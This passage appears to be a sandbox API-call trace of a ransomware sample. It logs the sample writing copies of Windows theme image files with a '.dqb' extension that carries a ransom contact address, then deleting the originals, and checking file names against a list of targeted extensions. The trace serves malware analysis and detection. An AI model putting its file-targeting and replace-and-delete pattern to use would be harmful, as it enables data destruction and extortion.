lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.016] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1560) returned 1 [0043.016] CloseHandle (hObject=0x174) returned 1 [0043.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 0x20 [0043.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.016] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.016] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0043.018] GetLastError () returned 0x0 [0043.018] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x618, lpOverlapped=0x0) returned 1 [0043.244] WriteFile (in: hFile=0x1a4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x620, lpOverlapped=0x0) returned 1 [0043.270] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0043.270] WriteFile (in: hFile=0x1a4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.271] SetEndOfFile (hFile=0x1a4) returned 1 [0043.271] CloseHandle (hObject=0x1a4) returned 1 [0043.271] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.271] SetEndOfFile (hFile=0x174) returned 1 [0043.272] CloseHandle (hObject=0x174) returned 1 [0043.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.272] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 1 [0043.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.272] lstrlenW (lpString=".doc") returned 4 [0043.272] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.272] lstrlenW (lpString=".docx") returned 5 [0043.272] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.272] lstrlenW (lpString=".pdf") returned 4 [0043.272] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.272] lstrlenW (lpString=".xls") returned 4 [0043.272] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.272] lstrlenW (lpString=".xlsx") returned 5 [0043.272] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.272] lstrlenW (lpString=".ppt") returned 4 [0043.272] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.272] lstrlenW (lpString=".zip") returned 4 [0043.272] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.272] lstrlenW (lpString=".rar") returned 4 [0043.272] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.273] lstrlenW (lpString=".bz2") returned 4 [0043.273] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.273] lstrlenW (lpString=".7z") returned 3 [0043.273] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.273] lstrlenW (lpString=".dbf") returned 4 [0043.273] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.273] lstrlenW (lpString=".1cd") returned 4 [0043.273] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.273] lstrlenW (lpString=".jpg") returned 4 [0043.273] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.273] lstrlenW (lpString=".doc") returned 4 [0043.273] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.273] lstrlenW (lpString=".docx") returned 5 [0043.273] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.273] lstrlenW (lpString=".pdf") returned 4 [0043.273] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.273] lstrlenW (lpString=".xls") returned 4 [0043.273] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.273] lstrlenW (lpString=".xlsx") returned 5 [0043.273] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.273] lstrlenW (lpString=".ppt") returned 4 [0043.273] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.273] lstrlenW (lpString=".zip") returned 4 [0043.273] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.273] lstrlenW (lpString=".rar") returned 4 [0043.273] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.273] lstrlenW (lpString=".bz2") returned 4 [0043.273] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.273] lstrlenW (lpString=".7z") returned 3 [0043.274] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.274] lstrlenW (lpString=".dbf") returned 4 [0043.274] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.274] lstrlenW (lpString=".1cd") returned 4 [0043.274] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.274] lstrlenW (lpString=".jpg") returned 4 [0043.274] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.274] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.274] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.530] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=2044) returned 1 [0043.530] CloseHandle (hObject=0x1dc) returned 1 [0043.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 0x20 [0043.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.530] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.530] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.531] GetLastError () returned 0x0 [0043.531] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x7fc, lpOverlapped=0x0) returned 1 [0043.533] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x800, lpOverlapped=0x0) returned 1 [0043.533] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0043.533] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.534] SetEndOfFile (hFile=0x178) returned 1 [0043.534] CloseHandle (hObject=0x178) returned 1 [0043.534] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.534] SetEndOfFile (hFile=0x1dc) returned 1 [0043.534] CloseHandle (hObject=0x1dc) returned 1 [0043.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.535] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 1 [0043.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.535] lstrlenW (lpString=".doc") returned 4 [0043.535] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.535] lstrlenW (lpString=".docx") returned 5 [0043.535] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.535] lstrlenW (lpString=".pdf") returned 4 [0043.535] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.535] lstrlenW (lpString=".xls") returned 4 [0043.535] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.535] lstrlenW (lpString=".xlsx") returned 5 [0043.535] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.535] lstrlenW (lpString=".ppt") returned 4 [0043.535] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.535] lstrlenW (lpString=".zip") returned 4 [0043.535] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.535] lstrlenW (lpString=".rar") returned 4 [0043.535] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.535] lstrlenW (lpString=".bz2") returned 4 [0043.535] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.535] lstrlenW (lpString=".7z") returned 3 [0043.536] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.536] lstrlenW (lpString=".dbf") returned 4 [0043.536] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.536] lstrlenW (lpString=".1cd") returned 4 [0043.536] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.536] lstrlenW (lpString=".jpg") returned 4 [0043.536] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.536] lstrlenW (lpString=".doc") returned 4 [0043.536] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.536] lstrlenW (lpString=".docx") returned 5 [0043.536] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.536] lstrlenW (lpString=".pdf") returned 4 [0043.536] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.536] lstrlenW (lpString=".xls") returned 4 [0043.536] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.536] lstrlenW (lpString=".xlsx") returned 5 [0043.536] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.536] lstrlenW (lpString=".ppt") returned 4 [0043.536] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.536] lstrlenW (lpString=".zip") returned 4 [0043.536] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.536] lstrlenW (lpString=".rar") returned 4 [0043.536] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.536] lstrlenW (lpString=".bz2") returned 4 [0043.536] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.536] lstrlenW (lpString=".7z") returned 3 [0043.536] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.536] lstrlenW (lpString=".dbf") returned 4 [0043.537] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.537] lstrlenW (lpString=".1cd") returned 4 [0043.537] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0043.537] lstrlenW (lpString=".jpg") returned 4 [0043.537] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.537] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.537] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.537] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.537] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=3957) returned 1 [0043.537] CloseHandle (hObject=0x1dc) returned 1 [0043.537] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 0x20 [0043.537] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.537] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.537] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.538] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0043.540] GetLastError () returned 0x0 [0043.540] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xf75, lpOverlapped=0x0) returned 1 [0043.541] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xf80, lpOverlapped=0x0) returned 1 [0043.542] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0043.542] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.542] SetEndOfFile (hFile=0x160) returned 1 [0043.542] CloseHandle (hObject=0x160) returned 1 [0043.542] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.542] SetEndOfFile (hFile=0x1dc) returned 1 [0043.543] CloseHandle (hObject=0x1dc) returned 1 [0043.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.543] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 1 [0043.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.543] lstrlenW (lpString=".doc") returned 4 [0043.544] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.544] lstrlenW (lpString=".docx") returned 5 [0043.544] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.544] lstrlenW (lpString=".pdf") returned 4 [0043.544] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.544] lstrlenW (lpString=".xls") returned 4 [0043.544] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.544] lstrlenW (lpString=".xlsx") returned 5 [0043.544] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.544] lstrlenW (lpString=".ppt") returned 4 [0043.544] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.544] lstrlenW (lpString=".zip") returned 4 [0043.544] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.544] lstrlenW (lpString=".rar") returned 4 [0043.544] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.544] lstrlenW (lpString=".bz2") returned 4 [0043.544] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.544] lstrlenW (lpString=".7z") returned 3 [0043.544] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.544] lstrlenW (lpString=".dbf") returned 4 [0043.544] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.544] lstrlenW (lpString=".1cd") returned 4 [0043.544] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.544] lstrlenW (lpString=".jpg") returned 4 [0043.544] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.544] lstrlenW (lpString=".doc") returned 4 [0043.544] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.544] lstrlenW (lpString=".docx") returned 5 [0043.544] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.545] lstrlenW (lpString=".pdf") returned 4 [0043.545] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.545] lstrlenW (lpString=".xls") returned 4 [0043.545] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.545] lstrlenW (lpString=".xlsx") returned 5 [0043.545] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.545] lstrlenW (lpString=".ppt") returned 4 [0043.545] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.545] lstrlenW (lpString=".zip") returned 4 [0043.545] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.545] lstrlenW (lpString=".rar") returned 4 [0043.545] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.545] lstrlenW (lpString=".bz2") returned 4 [0043.545] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.545] lstrlenW (lpString=".7z") returned 3 [0043.545] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.545] lstrlenW (lpString=".dbf") returned 4 [0043.545] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.545] lstrlenW (lpString=".1cd") returned 4 [0043.545] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0043.545] lstrlenW (lpString=".jpg") returned 4 [0043.545] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.545] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.545] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common 